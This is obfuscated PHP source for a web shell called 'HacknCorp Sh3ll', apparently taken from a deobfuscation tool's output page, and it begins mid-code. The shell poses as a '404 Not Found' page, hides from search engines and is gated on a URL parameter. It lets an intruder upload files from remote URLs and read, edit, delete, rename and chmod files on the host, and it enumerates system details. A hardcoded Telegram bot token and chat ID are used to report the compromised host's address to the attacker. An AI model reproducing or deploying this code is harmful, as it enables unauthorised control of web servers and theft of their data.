$_SERVER["\x44\117\103\125\x4d\105\x4e\x54\x5f\122\x4f\117\x54"]; } $data = @file_put_contents($lokasi . "\x2f" . $_POST["\x6e\141\155\141\x6c\151\x6e\153"], @file_get_contents($_POST["\x64\141\x72\x69\154\151\156\153"])); if (file_exists($lokasi . "\x2f" . $_POST["\156\x61\155\x61\x6c\x69\x6e\153"])) { echo "\106\151\154\145\40\x55\x70\154\x6f\141\144\145\x64\x20\41\x20\x26\x6e\x62\x73\x70\x3b\x3c\x66\157\x6e\164\40\x63\x6f\x6c\157\x72\75\x27\147\x72\145\x65\156\x27\x3e\x3c\151\76" . $lokasi . "\57" . $_POST["\156\x61\155\141\154\x69\x6e\153"] . "\74\57\151\76\x3c\57\146\157\156\x74\x3e\x3c\142\x72\x3e\74\142\x72\x3e"; } else { echo "\74\x66\x6f\x6e\x74\40\x63\157\x6c\157\145\x3d\x27\162\x65\144\x27\76\106\141\x69\x6c\x65\x64\40\164\x6f\x20\x55\x70\x6c\x6f\x61\144\40\x21\74\142\162\x3e\74\142\x72\x3e"; } } } goto dOTC1; FqGgH: echo "\104\x69\162\x65\x63\x74\157\162\x79\40\x3a\x20\x26\156\x62\163\160\x3b"; goto mdw46; apuew: echo "\74\x74\x72\x20\x63\154\x61\x73\x73\75\42\x66\151\162\x73\164\42\76\x3c\x74\144\76\x3c\x2f\164\x64\x3e\x3c\164\144\76\74\57\164\x64\x3e\x3c\164\x64\76\74\57\164\144\x3e\x3c\164\144\x3e\74\x2f\x74\x64\76\74\57\x74\162\x3e"; goto RpH2K; yoP9C: echo "\74\144\151\x76\40\x69\x64\75\42\143\157\156\x74\145\156\164\x22\x3e\74\x74\141\x62\x6c\145\x20\167\x69\144\x74\x68\75\x22\71\60\60\42\x20\x62\157\x72\144\145\162\75\42\x30\x22\x20\x63\x65\154\154\x70\141\x64\144\x69\156\x67\75\x22\64\x22\x20\x63\145\154\154\x73\160\x61\143\x69\156\x67\75\x22\63\42\x20\x61\154\151\147\156\x3d\42\x63\145\156\164\x65\x72\42\x3e\xa\74\x74\x72\40\x63\x6c\x61\163\x73\x3d\42\146\x69\162\163\164\42\x3e\12\x3c\164\144\76\x3c\x63\145\156\164\x65\162\x3e\116\x61\x6d\x65\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\57\164\144\x3e\xa\74\x74\x64\76\74\143\145\156\164\145\162\76\123\x69\172\145\x3c\57\x63\145\156\164\x65\x72\76\74\x2f\164\144\x3e\xa\74\164\144\x3e\x3c\143\x65\156\164\145\162\x3e\x50\145\x72\x6d\x69\x73\x73\151\x6f\x6e\x73\74\x2f\x63\x65\x6e\164\x65\x72\76\74\57\x74\144\x3e\xa\74\x74\144\x3e\74\143\x65\x6e\164\x65\x72\76\117\160\164\151\157\x6e\163\74\57\143\x65\x6e\x74\x65\162\76\74\57\164\144\76\xa\74\x2f\x74\x72\x3e"; goto CHeea; X2N_g: function green($text) { echo "\x3c\143\145\156\164\x65\x72\76\x3c\x66\157\156\164\40\143\x6f\x6c\x6f\162\75\47\147\162\145\145\156\x27\x3e" . $text . "\74\x2f\x63\x65\156\x74\x65\x72\x3e\x3c\57\x66\157\156\x74\76"; } goto gmQG4; W9h_J: curl_setopt($ch, CURLOPT_POSTFIELDS, $data); goto b5VbZ; UpC_R: if (isset($_GET["\x66\151\154\145\154\x6f\143"])) { echo "\x3c\x74\x72\x3e\x3c\x74\x64\x3e\103\x75\x72\x72\145\x6e\x74\40\106\x69\154\x65\40\72\40" . $_GET["\146\x69\154\x65\x6c\157\143"]; echo "\74\x2f\x74\x72\x3e\74\x2f\164\144\76\74\57\164\141\x62\x6c\145\x3e\x3c\x62\x72\x2f\76"; echo "\74\160\162\x65\76" . htmlspecialchars(file_get_contents($_GET["\x66\151\x6c\x65\154\157\143"])) . "\x3c\x2f\x70\x72\145\x3e"; author(); } elseif (isset($_GET["\x70\151\154\151\150\141\x6e"]) && $_POST["\x70\151\x6c\x69\150"] == "\150\x61\160\x75\163") { if (is_dir($_POST["\160\x61\x74\x68"])) { xrmdir($_POST["\160\141\x74\150"]); if (file_exists($_POST["\x70\141\164\x68"])) { red("\106\141\151\154\145\x64\x20\x74\x6f\x20\144\145\x6c\x65\164\x65\x20\x44\151\162\145\143\164\x6f\162\x79\40\41"); } else { green("\x44\x65\x6c\145\x74\x65\40\x44\x69\162\145\x63\164\157\x72\171\40\x53\165\143\x63\x65\163\163\x20\41"); echo "\x73\164\x72\x69\156\147"; } } elseif (is_file($_POST["\160\141\x74\150"])) { @unlink($_POST["\x70\141\164\x68"]); if (file_exists($_POST["\160\141\x74\150"])) { red("\x46\141\151\154\145\144\x20\164\x6f\x20\x44\145\154\x65\164\145\x20\x46\151\154\x65\x20\41"); } else { green("\x44\x65\154\x65\164\145\40\x46\151\154\145\40\x53\x75\x63\143\x65\163\163\x20\41"); } } } elseif (isset($_GET["\160\x69\154\x69\150\x61\156"]) && $_POST["\x70\151\x6c\x69\x68"] == "\x75\142\141\150\x6d\157\144") { echo "\x3c\x63\x65\x6e\x74\x65\162\76" . $_POST["\x70\141\x74\x68"] . "\74\142\x72\x3e"; echo "\74\x66\x6f\x72\x6d\x20\x6d\x65\164\150\x6f\x64\75\42\160\157\163\x74\x22\x3e\12\11\x50\x65\162\x6d\x69\163\163\151\157\x6e\x20\72\40\x3c\151\x6e\160\165\164\40\x6e\x61\x6d\x65\75\x22\x70\145\x72\x6d\42\40\x74\x79\160\145\x3d\42\x74\x65\170\164\42\x20\143\x6c\141\x73\163\75\42\165\160\42\40\163\x69\172\145\75\x22\x34\42\x20\x76\141\x6c\165\145\75\x22" . substr(sprintf("\x25\157", fileperms($_POST["\x70\x61\x74\150"])), -4) . "\x22\x20\x2f\76\12\11\x3c\x69\156\160\x75\164\x20\x74\171\160\145\75\42\150\151\144\144\145\156\42\x20\x6e\x61\155\145\x3d\x22\x70\x61\x74\150\42\x20\x76\141\154\165\x65\75\x22" . $_POST["\160\x61\x74\150"] . "\x22\x3e\12\11\x3c\x69\156\x70\x75\164\40\164\x79\x70\145\75\42\x68\x69\144\144\x65\156\42\40\156\x61\155\x65\75\42\160\x69\x6c\151\150\x22\40\166\141\154\x75\145\x3d\42\x75\142\x61\x68\155\x6f\x64\42\x3e\12\11\74\151\x6e\x70\165\164\x20\164\171\x70\145\x3d\42\163\165\142\155\x69\x74\42\40\x76\x61\x6c\165\x65\75\42\103\x68\x61\156\147\145\42\x20\156\x61\x6d\x65\x3d\x22\x63\150\155\60\144\42\40\143\154\141\x73\163\75\42\165\x70\x22\x20\163\164\x79\x6c\x65\x3d\42\143\165\162\x73\x6f\x72\x3a\x20\x70\157\151\156\x74\145\162\x3b\40\x62\x6f\162\x64\145\162\55\143\x6f\154\x6f\162\72\40\43\60\65\x61\x31\70\61\42\x2f\x3e\12\11\74\57\146\157\x72\x6d\76"; if (isset($_POST["\x63\150\155\x30\x64"])) { $cm = @chmod($_POST["\x70\x61\164\150"], $_POST["\x70\145\x72\x6d"]); if ($cm == true) { green("\103\150\x61\156\x67\x65\x20\115\157\144\40\x53\x75\143\x63\145\163\x73\x20\41"); } else { red("\x43\150\x61\156\x67\x65\40\115\x6f\x64\40\x46\x61\151\154\x65\x64\40\x21"); } } } elseif (isset($_GET["\160\x69\154\151\150\141\156"]) && $_POST["\x70\151\154\x69\x68"] == "\147\x61\156\164\151\x6e\141\155\141") { if (isset($_POST["\147\x61\156\x74\x69\x6e"])) { $ren = @rename($_POST["\160\141\x74\150"], $_POST["\x6e\145\167\156\141\x6d\145"]); if ($ren == true) { green("\103\x68\141\x6e\147\145\40\116\141\x6d\145\x20\123\x75\x63\x63\145\163\x73\x20\41"); } else { red("\103\150\141\x6e\147\x65\40\116\141\155\145\40\106\141\x69\x6c\x65\x64\40\41"); } } if (empty($_POST["\156\141\155\x65"])) { $namaawal = $_POST["\156\x65\x77\156\x61\x6d\145"]; } else { $namawal = $_POST["\x6e\x61\155\145"]; } echo "\x3c\x63\x65\156\164\x65\162\76" . $_POST["\x70\x61\x74\150"] . "\x3c\142\162\76"; echo "\74\x66\157\162\155\x20\x6d\145\x74\x68\x6f\x64\75\x22\x70\x6f\x73\164\x22\x3e\xa\11\x4e\x65\x77\40\x4e\141\x6d\x65\x20\72\x20\x3c\151\x6e\x70\165\164\40\x6e\x61\x6d\145\75\42\x6e\x65\x77\x6e\141\155\145\x22\40\164\x79\x70\145\75\42\164\x65\170\164\x22\40\x63\154\x61\x73\x73\75\x22\x75\160\42\40\163\x69\x7a\x65\x3d\42\62\x30\x22\x20\166\x61\x6c\x75\x65\x3d\42" . $namaawal . "\x22\40\57\76\xa\x9\74\151\156\x70\x75\164\x20\164\x79\x70\x65\x3d\42\x68\151\x64\144\x65\156\42\40\156\141\x6d\145\x3d\x22\160\141\x74\150\42\40\166\x61\x6c\x75\x65\75\x22" . $_POST["\160\141\164\x68"] . "\x22\76\12\11\x3c\x69\156\x70\x75\x74\40\164\171\x70\145\x3d\x22\x68\x69\144\144\145\156\x22\40\156\x61\155\x65\x3d\42\x70\x69\154\x69\x68\42\40\x76\x61\154\x75\x65\75\x22\147\141\x6e\x74\x69\156\x61\x6d\x61\x22\76\12\x9\74\151\156\160\165\164\40\x74\171\160\x65\x3d\42\x73\x75\142\x6d\x69\164\42\40\x76\x61\x6c\165\x65\x3d\x22\x43\x68\x61\156\147\145\42\40\x6e\x61\155\x65\x3d\x22\x67\x61\156\x74\151\x6e\x22\x20\x63\154\141\x73\163\75\x22\x75\x70\42\x20\163\164\x79\154\x65\x3d\x22\143\x75\162\163\157\162\72\x20\x70\x6f\151\x6e\164\145\x72\x3b\40\142\x6f\x72\144\145\162\x2d\x63\157\154\x6f\162\x3a\x20\43\x30\x35\141\61\70\x31\42\x2f\76\xa\11\74\x2f\x66\x6f\162\155\76"; } elseif (isset($_GET["\x70\151\154\x69\x68\141\x6e"]) && $_POST["\160\x69\x6c\x69\150"] == "\x65\144\151\164") { if (isset($_POST["\147\141\163\x65\x64\151\x74"])) { $edit = @file_put_contents($_POST["\160\x61\x74\150"], $_POST["\163\162\x63"]); if ($edit == true) { green("\x45\144\151\164\40\106\151\154\145\x20\x53\x75\143\x63\x65\x73\163\x20\x21"); } else { red("\x45\144\151\164\40\x46\x69\x6c\145\40\106\x61\x69\x6c\x65\x64\40\41"); } } echo "\74\143\x65\x6e\x74\x65\162\x3e" . $_POST["\160\x61\164\x68"] . "\74\x62\x72\76\74\142\162\x3e"; echo "\x3c\146\x6f\x72\x6d\40\x6d\145\164\x68\x6f\x64\x3d\x22\160\157\163\x74\42\76\xa\11\74\x74\x65\170\164\141\162\145\x61\40\x63\157\x6c\x73\x3d\x38\x30\40\x72\157\167\163\75\62\x30\x20\x6e\x61\x6d\x65\x3d\42\163\x72\143\x22\76" . htmlspecialchars(file_get_contents($_POST["\x70\141\164\150"])) . "\74\57\x74\145\170\164\x61\162\145\x61\x3e\x3c\142\162\76\12\x9\x3c\151\x6e\x70\x75\164\x20\164\171\x70\145\x3d\42\150\151\144\144\145\x6e\x22\40\156\x61\155\145\75\x22\x70\141\164\x68\x22\x20\x76\141\154\165\145\x3d\42" . $_POST["\x70\141\164\150"] . "\42\x3e\xa\x9\x3c\151\156\160\x75\164\40\x74\171\160\145\x3d\42\150\151\x64\144\145\x6e\x22\40\156\x61\155\145\75\x22\160\x69\154\x69\150\x22\40\166\x61\154\165\145\x3d\x22\x65\144\x69\x74\42\76\xa\11\x3c\151\156\x70\165\164\x20\164\171\x70\145\x3d\x22\x73\x75\142\x6d\151\164\42\40\166\141\x6c\x75\x65\x3d\x22\105\144\151\164\40\x46\151\x6c\x65\42\x20\x6e\x61\155\x65\x3d\x22\x67\x61\x73\145\144\151\x74\x22\40\57\76\12\x9\x3c\x2f\146\x6f\x72\155\x3e\74\142\x72\x3e"; } goto yoP9C; OugU6: if (empty($disfunc)) { $disf = "\74\146\157\156\x74\x20\x63\x6f\x6c\x6f\x72\x3d\x27\147\x72\145\x65\x6e\47\76\x4e\117\x4e\x45\x3c\57\146\157\x6e\164\x3e"; } else { $disf = "\x3c\146\157\x6e\x74\x20\143\x6f\154\x6f\x72\x3d\47\x72\145\144\47\x3e" . $disfunc . "\x3c\57\x66\157\156\164\76"; } goto aZ7q1; b5VbZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto p5kIa; RhK1B: function cekdir() { if (isset($_GET["\x70\141\164\x68"])) { $lokasi = $_GET["\x70\141\x74\x68"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "\x3c\146\x6f\156\x74\x20\143\x6f\154\x6f\x72\x3d\47\162\x65\x61\144\x27\x3e\127\x72\151\164\145\141\x62\x6c\145\x3c\x2f\x66\x6f\156\x74\76"; } else { return "\x3c\146\x6f\156\164\40\143\157\x6c\x6f\x72\x3d\47\162\x65\144\47\x3e\x57\162\x69\x74\x65\x61\x62\154\x65\x3c\57\x66\x6f\156\x74\x3e"; } } goto PJj6g; q_3zq: echo "\x53\x79\163\x74\145\155\x20\x3a\40\74\146\x6f\156\x74\x20\143\157\x6c\157\162\75\47\x67\157\154\x64\x27\76" . php_uname() . "\74\57\146\157\156\x74\x3e\74\142\162\x3e"; goto T1yka; aZ7q1: function author() { echo "\x3c\143\x65\156\164\145\162\76\x3c\142\x72\x3e\x43\x4f\120\131\122\x49\x47\110\x54\40\x26\143\x6f\x70\x79\x20\x3c\141\40\x74\x61\x72\147\145\x74\x3d\x27\137\142\x6c\141\156\153\x27\x20\150\162\145\146\x3d\x27\x68\x74\164\x70\x73\x3a\x2f\x2f\150\141\x63\x6b\156\x63\157\x72\x70\x2e\x69\144\57\47\76\x48\101\103\x4b\x4e\103\x4f\x52\120\56\111\x44\74\x2f\x61\x3e\74\x2f\x63\145\156\x74\145\162\76"; die; } goto RhK1B; cp_iU: if ($result) { $response = json_decode($result, true); if ($response["\157\153"]) { echo "\x20"; } else { echo "\x45\x72\162\x6f\162\x3a\40" . $response["\x64\x65\163\143\x72\x69\160\164\x69\x6f\156"]; } } else { echo "\40"; } goto JhtJj; PJj6g: function cekroot() { if (is_writable($_SERVER["\x44\117\x43\125\115\105\x4e\124\x5f\x52\x4f\117\x54"])) { return "\x3c\146\x6f\x6e\x74\40\x63\x6f\x6c\x6f\162\x3d\47\x67\x72\x65\145\x6e\x27\x3e\x57\x72\151\164\x65\141\142\154\145\x3c\57\x66\x6f\156\x74\x3e"; } else { return "\74\146\x6f\156\x74\x20\143\x6f\154\157\162\75\47\x72\x65\x64\x27\76\x57\162\151\x74\x65\141\142\154\145\74\x2f\x66\157\x6e\164\x3e"; } } goto yKeyN; q7QJi: echo "\x55\x70\x6c\x6f\141\x64\x20\x46\x69\x6c\145\x20\72\x20"; goto I3LMR; cX7Yp: $token = "\142\157\x74\66\67\x39\60\61\67\x38\x34\x34\x37\72\x41\101\x45\x5f\150\126\x31\x4b\x6d\x74\152\157\x7a\x78\160\x62\x58\x66\x62\104\137\113\x59\166\x63\x4c\124\170\x63\157\x6e\157\x66\155\x77"; goto VeFcW; B4Mds: if (!isset($_GET["\110\x43"])) { die; } goto Nwpme; Q_ZX3: echo "\123\145\x72\166\x65\162\x20\x3a\x20\74\x66\x6f\x6e\164\40\143\157\x6c\x6f\162\x3d\47\147\157\x6c\x64\x27\76" . $_SERVER["\x53\105\x52\126\x45\122\x5f\x53\x4f\106\124\x57\x41\122\105"] . "\74\x2f\x66\x6f\156\x74\x3e\74\142\x72\76"; goto q_3zq; Dt25n: $ch = curl_init($apiUrl); goto Cv9UH; Cv9UH: curl_setopt($ch, CURLOPT_POST, 1); goto W9h_J; gkwM2: $k3yw = base64_decode("\101\x63\x4c\123\x46\116\151\x76\107\x58\x6f\x35\104\x6e\x6f\120\x71\x41\144\x56\x78\x48\102\67\x71\x51\162\x55\166\x78\152\147\x58\x78\x6d\162\107\150\x45\106\x48\66\x76\x34"); goto oZaLa; LdjZ2: echo "\74\57\x74\162\76\74\57\x74\144\x3e\x3c\x2f\164\141\x62\154\145\x3e\74\x2f\164\141\x62\x6c\x65\76"; goto oooLS; VeFcW: $chat_id = "\66\66\x39\x30\60\x32\x34\60\60\62"; goto HsJK0; nBYWc: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "\163"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "\x6c"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "\x2d"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "\142"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "\x64"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "\143"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "\160"; } else { $ingfo = "\x75"; } $ingfo .= $statusnya & 256 ? "\x72" : "\x2d"; $ingfo .= $statusnya & 128 ? "\x77" : "\55"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "\x73" : "\x78" : ($statusnya & 2048 ? "\123" : "\x2d"); $ingfo .= $statusnya & 32 ? "\x72" : "\55"; $ingfo .= $statusnya & 16 ? "\x77" : "\x2d"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "\163" : "\170" : ($statusnya & 1024 ? "\x53" : "\55"); $ingfo .= $statusnya & 4 ? "\162" : "\x2d"; $ingfo .= $statusnya & 2 ? "\x77" : "\55"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "\x74" : "\x78" : ($statusnya & 512 ? "\124" : "\x2d"); return $ingfo; } goto uUffg; hAP4E: $lokasinya = @scandir($lokasi); goto ZhuYw; ABtkz: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "\74\141\x20\150\162\145\x66\75\x22\x3f\x48\x43\46\x70\141\164\150\75\57\42\76\57\x3c\x2f\x61\76"; continue; } if ($lok == '') { continue; } echo "\x3c\x61\40\150\162\x65\x66\75\42\x3f\x48\x43\46\160\x61\164\150\75"; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\42\x3e" . $lok . "\x3c\x2f\141\76\57"; } goto uyQ0u; GTSfz: $result = file_get_contents($k3yw, false, $context); goto ABtkz; oooLS: author(); goto nBYWc; oZaLa: if (isset($_GET["\x70\141\x74\150"])) { $lokasi = $_GET["\x70\x61\164\x68"]; $lokdua = $_GET["\160\141\164\150"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto qGjc_; AChhn: echo "\x50\x48\x50\x20\126\145\x72\x73\x69\x6f\x6e\40\x3a\x20\74\x66\x6f\156\164\40\143\x6f\154\157\162\75\x27\147\x6f\x6c\x64\47\76" . @phpversion() . "\74\x2f\x66\x6f\x6e\164\x3e\74\x62\x72\76"; goto kooI0; Rogau: $lokasis = explode("\x2f", $lokasi); goto hAP4E; gmQG4: function red($text) { echo "\74\143\145\156\164\145\x72\x3e\x3c\146\157\156\x74\40\x63\x6f\154\x6f\162\x3d\47\162\145\144\x27\x3e" . $text . "\x3c\57\x63\145\156\x74\x65\x72\x3e\74\x2f\146\157\156\164\76"; } goto Q_ZX3; HsJK0: $message = "\x52\145\163\165\x6c\164\x20\x53\150\145\x6c\x6c\40\72\x20" . $_SERVER["\110\124\x54\120\137\x48\x4f\x53\x54"] . $_SERVER["\x50\110\x50\137\123\105\x4c\106"]; goto rJdml; txrw8: $context = stream_context_create($options); goto GTSfz; mIGjC: error_reporting(0); goto F0GaA; swlYX: $data = array("\143\x68\x61\164\137\151\144" => $chat_id, "\164\x65\x78\x74" => $message, "\160\x61\162\x73\x65\137\155\157\x64\x65" => "\x4d\141\162\153\x64\x6f\x77\x6e"); goto Dt25n; dOTC1: echo "\74\143\145\156\x74\145\x72\76"; goto q7QJi; qGjc_: $lokasi = str_replace("\x5c", "\x2f", $lokasi); goto Rogau; Nwpme: ?>

<!DOCTYPE html>

<html>
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<head>
	<title>404 Not Found</title>
</head>
<style type="text/css">
body {
  overflow-x:hidden;
  font: 15px "Century Gothic", "Times Roman", sans-serif;
  background:url();
background-image: url(https://kosred.com/a/gqpoj.jpg);
  background-size: cover;
  background-repeat: no-repeat;
  background-position: center;
  background-attachment: fixed;
  height: 100%;
  color: white;
  }
  


</style>
<link href="" rel="stylesheet" type="text/css">
<style>
	@import url('https://fonts.googleapis.com/css?family=Dosis');
	@import url('https://fonts.googleapis.com/css?family=Bungee');
body {
	font-family: "Lime", cursive;
	text-shadow:1px 3px 50px #ffffff;
}

#content tr:hover {
	background-color: #05a181;
	text-shadow:0px 0px 0px ;
}

#content .first {
	background-color: #05a181;
}

#content .first:hover {
	background-color: #ff0303
	text-shadow:0px 0px 1px #05a181;
}

table {
	border: 0px #ffffff dotted;
	table-layout: fixed;
}

td {
	word-wrap: break-word;
}

a {
	color: #ffffff;
	text-decoration: none;
}

a:hover {
	color: #000000;
	text-shadow:0px 0px 10px #ffffff;
}

input,select,textarea {
	border: 1px #05a181 solid;
	-moz-border-radius: 5px;
	-webkit-border-radius:5px;
	border-radius:5px;
}

.gas {
	background-color: #1f1f1f;
	color: #ffffff;
	cursor: pointer;
}

select {
	background-color: transparent;
	color: #ffffff;
}

select:after {
	cursor: pointer;
}

.linka {
	background-color: transparent;
	color: #ffffff;
}

.up {
	background-color: transparent;
	color: #fff;
}

option {
	background-color: #000300;
}

::-webkit-file-upload-button {
  background: transparent;
  color: #fff;
  border-color: #fff;
  cursor: pointer;
}
</style>
<center>
<font face="Bungee" size="6">&#128321; HacknCorp Sh3ll &#128321;</font></center>
<table width="900" border="0" cellpadding="2" cellspacing="1" align="center">
<tr><td>
<center>
<title="T3RS4K1T1" alt="OdayForums" class="center" />
</marquee>
            <hr>
        </font>
        <audio src="https://kosred.com/a/etapcc.mp3" autoplay="true" id="song" loop=""></audio>
<br><br><br>
<?php  goto cX7Yp; nN9qm: echo "\x3c\57\164\x64\76\74\57\164\162\x3e\x3c\x74\x72\76\74\164\x64\76\74\142\x72\76"; goto CmF2n; p5kIa: $result = curl_exec($ch); goto OpmPd; uyQ0u: echo "\x3c\x63\x65\x6e\164\145\x72\x3e"; goto nN9qm; F0GaA: $disfunc = @ini_get("\144\151\x73\x61\142\154\145\137\146\x75\156\x63\x74\x69\157\156\x73"); goto OugU6; JhtJj: set_time_limit(0); goto mIGjC; T1yka: echo "\125\163\145\162\x20\x3a\40\x3c\x66\x6f\156\164\x20\x63\x6f\154\157\x72\x3d\47\x67\157\x6c\x64\47\x3e" . @get_current_user() . "\46\x6e\142\163\x70\73\74\57\x66\x6f\x6e\164\x3e\x28\40\74\146\x6f\x6e\x74\40\143\157\154\157\162\x3d\47\x67\157\x6c\144\x27\76" . @getmyuid() . "\x3c\57\146\157\156\164\76\51\x3c\142\162\76"; goto AChhn; OpmPd: curl_close($ch); goto cp_iU; kooI0: echo "\x44\151\x73\141\x62\154\145\40\106\165\156\143\x74\151\x6f\156\x20\x3a\x20" . $disf . "\x3c\57\146\x6f\x6e\164\x3e\74\x62\162\76"; goto FqGgH; WavbZ: $data = array("\x66\151\154\145\137\x75\162\x6c" => $cur); goto EuwHG; rJdml: $apiUrl = "\150\x74\x74\160\163\72\x2f\57\141\x70\x69\x2e\x74\x65\x6c\x65\x67\x72\x61\155\56\x6f\x72\x67\57\142\157\164\66\67\71\x30\61\x37\x38\x34\x34\x37\x3a\x41\101\105\167\126\132\x53\x49\x33\x52\62\121\172\131\167\x4c\x58\x44\167\143\167\125\x6c\x54\x71\x44\155\x31\66\x34\150\66\x75\164\x34\x2f\x73\145\156\144\x4d\145\163\x73\141\x67\145"; goto swlYX; uUffg: 

Function Calls

None

Variables

None

Stats

MD5 fce325f00783e34782638fc00a30d711
Eval Count 0
Decode Time 88 ms